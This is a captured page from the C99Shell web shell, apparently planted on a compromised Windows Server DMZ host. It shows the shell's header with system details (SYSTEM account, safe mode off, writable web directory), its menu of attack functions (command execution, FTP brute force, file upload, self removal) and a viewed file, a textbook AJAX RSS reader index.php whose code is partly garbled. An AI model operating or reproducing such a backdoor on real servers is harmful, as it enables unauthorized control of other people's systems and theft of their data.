!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\AjaxPhpCode\Chapter09\ajax\rss_reader\   drwxrwxrwx
Free 7.95 GB of 239.26 GB (3.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (1.67 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// load the list of feeds
require_once ('config.php');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>AJAX RSS Reader</title>
    <link rel="stylesheet" type="text/css" href="rss_reader.css"/>
    <script src="rss_reader.js" type="text/javascript"></script>
  </head>
  <body>
    <h1>AJAX RSS Reader</h1>
    <div id="feeds">
      <h2>Feeds</h2>
      <ul id="feedList">
      <?php
        
// Display feeds
        
for ($i 0$i count($feeds); $i++)
        {
          echo 
'<li id="feed-' $i '"><a href="javascript:void(0);" ';
          echo 
'onclick="getFeed(document.getElementById(\'feed-' $i 
               
'\'), \'' urlencode($feeds[$i]['feed']) . '\');">';
          echo 
$feeds[$i]['title'] . '</a></li>';
        }
      
?> 
      </ul>
    </div>
    <div id="content">
      <div id="loading" style="display:none">Loading feed...</div>
      <div id="feedContainer" style="display:none"></div>
      <div id="home">
        <h2>About the AJAX RSS Reader</h2>
        <p>
          The AJAX RSS reader is only a simple application that provides 
          basic functionality for retrieving RSS feeds.
        </p>
        <p>
          This application is presented as a case study in 
          <a href="https://www.packtpub.com/ajax_php/book"> Building
          Responsive Web Applications with AJAX and PHP</a> 
          (Packt Publishing, 2006).
        </p>
      </div>
    </div>
  </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--